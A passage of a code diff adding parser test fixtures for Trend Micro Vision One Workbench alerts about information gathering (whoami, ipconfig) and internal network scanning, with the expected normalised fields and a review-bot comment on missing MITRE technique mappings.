[\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": 
\"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], 
\"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": 
\"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": 
\"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": 
[\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": 
\"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}",
+ "event": {
+ "category": [
+ "intrusion_detection"
+ ],
+ "kind": "alert",
+ "reason": "Potential Information Gathering",
+ "type": [
+ "info"
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000"
+ },
+ "@timestamp": "2024-11-26T16:48:06Z",
+ "host": {
+ "id": "7b00c266-f17f-439f-bb94-3945d463a78b",
+ "ip": [
+ "10.0.0.6"
+ ],
+ "name": "windows10"
+ },
+ "observer": {
+ "product": "Vision One",
+ "vendor": "TrendMicro"
+ },
+ "process": {
+ "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ",
+ "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe",
+ "hash": {
+ "sha1": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55",
+ "sha256": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8"
+ },
+ "parent": {
+ "command_line": "C:\\Windows\\Explorer.EXE",
+ "executable": "C:\\Windows\\explorer.exe",
+ "hash": {
+ "sha256": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753"
+ },
+ "pid": 9920
+ },
+ "pid": 5040
+ },
+ "related": {
+ "hash": [
+ "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753",
+ "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55",
+ "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8"
+ ],
+ "ip": [
+ "10.0.0.6"
+ ],
+ "user": [
+ "jdoe"
+ ]
+ },
+ "rule": {
+ "name": "Potential Information Gathering"
+ },
+ "trendmicro": {
+ "vision_one": {
+ "alert_id": "WB-11111-22222222-00000",
+ "investigation_status": "New",
+ "severity": "low",
+ "status": "Open"
+ }
+ },
+ "user": {
+ "domain": "windows10",
+ "id": "windows10\\jdoe",
+ "name": "jdoe"
+ }
+ }
+}
\ No newline at end of file
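Review bot: The `expected` object never carries the `mitreTechniqueIds` the input already provides (`T1033` and `T1016` under `matchedFilters`), so this fixture pins a parser that drops the vendor's MITRE mapping; populating `threat.technique.id` (with `threat.framework` set to `MITRE ATT&CK`) would let downstream rules key on the technique instead of the free-text `rule.name`. The same gap applies to `T1046` in the next hunk (test_internal_network_scanner.json). Likewise the `objectCmd` indicators (`whoami.exe`, `ipconfig.exe`), which are the discovery commands that actually triggered the model, appear nowhere in `expected`, while `process.command_line` only holds the launching `PowerShell_ISE.exe` invocation; if that is the intended mapping, keeping them under the existing `trendmicro.vision_one` object would avoid losing the triggering artifact. Also note `user.domain` is `windows10`, which for this local account is the host name rather than an AD domain, so consumers should not treat it as one.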
diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json
new file mode 100644
index 000000000..d15f28c6f
--- /dev/null
+++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json
@@ -0,0 +1,74 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", 
\"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], 
\"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": 
[{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": 
\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}",
+ "event": {
+ "category": [
+ "intrusion_detection"
+ ],
+ "kind": "alert",
+ "reason": "Internal Network Scanner",
+ "type": [
+ "info"
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509"
+ },
+ "@timestamp": "2024-07-23T14:46:11Z",
+ "file": {
+ "directory": "C:\\Users\\doe.john\\Downloads",
+ "hash": {
+ "sha256": "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1"
+ },
+ "name": "Advanced_IP_Scanner_2.5.4594.1.exe",
+ "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe"
+ },
+ "host": {
+ "id": "3F783642-C0D0-4AFD-84B6-F6751E5BF80F",
+ "ip": [
+ "1.2.3.4"
+ ],
+ "name": "doe10"
+ },
+ "observer": {
+ "product": "Vision One",
+ "vendor": "TrendMicro"
+ },
+ "process": {
+ "command_line": "C:\\WINDOWS\\Explorer.EXE",
+ "executable": "C:\\Windows\\explorer.exe",
+ "hash": {
+ "sha256": "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631"
+ }
+ },
+ "related": {
+ "hash": [
+ "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631",
+ "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1"
+ ],
+ "ip": [
+ "1.2.3.4"
+ ],
